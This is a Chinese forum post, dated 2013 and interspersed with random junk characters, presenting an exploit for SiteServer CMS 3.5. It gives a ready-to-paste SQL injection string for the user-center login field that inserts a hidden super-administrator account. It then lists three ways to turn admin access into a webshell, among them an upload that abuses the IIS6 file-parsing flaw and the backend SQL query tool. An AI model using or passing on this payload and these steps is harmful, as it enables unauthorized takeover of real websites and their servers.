经测试秒杀最新的3.5版$ ~! c1 N: m0 l, X
stieserver官网:www.siteserver.cn
2 ^" [, {) a1 W8 p+ M1 r4 z" W _EXP:
8 t8 h- y" f/ O7 X+ r9 `0 T直接访问UserCenter/login.aspx
" Z$ R9 k; A8 J+ U4 S用户名处输入:
$ i, \, o$ t7 U( z9 ]# L
1 H) N% T9 n6 U `123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
/ S+ |5 u9 C+ j& K+ c9 k密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
2 B0 U8 ~8 n t! l0 B之后再访问后台SiteServer/login.aspx用插入的用户登陆) p& ~, L9 i9 U# F
后台拿webshell的三种方法:. D* @ _: Y" A, Y- F( L2 n
一、8 c3 g+ a6 x6 p0 x) f
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx- J% ~, N. z5 E- T' }. ~- S; Q
二、# s* ^* N- M8 v' s6 H* }
成员权限-》添加用户-》用户名为:1.asp
* V2 B( m1 c9 n% _http://127.0.0.1/usercenter/* j ^' U v2 ]* K: P# I
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
, J. e, P2 k9 ~7 \9 }(ps:后台添加用户时不会验证是否含有非法字符)
3 [! k( p& @% u) r1 U1 J三、+ W' Y8 n$ C; w3 Z. d
系统工具-》实用工具-》机器参数查看
; B9 s. i) o# ?; ^/ `. K# k可以看到数据库类型、名称,WEB路径2 R% i6 A! ?- t/ J
系统工具-》数据库工具-》SQL语句查询
! p- z) E3 H( w8 ? N+ A, F8 Q# l- F u这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对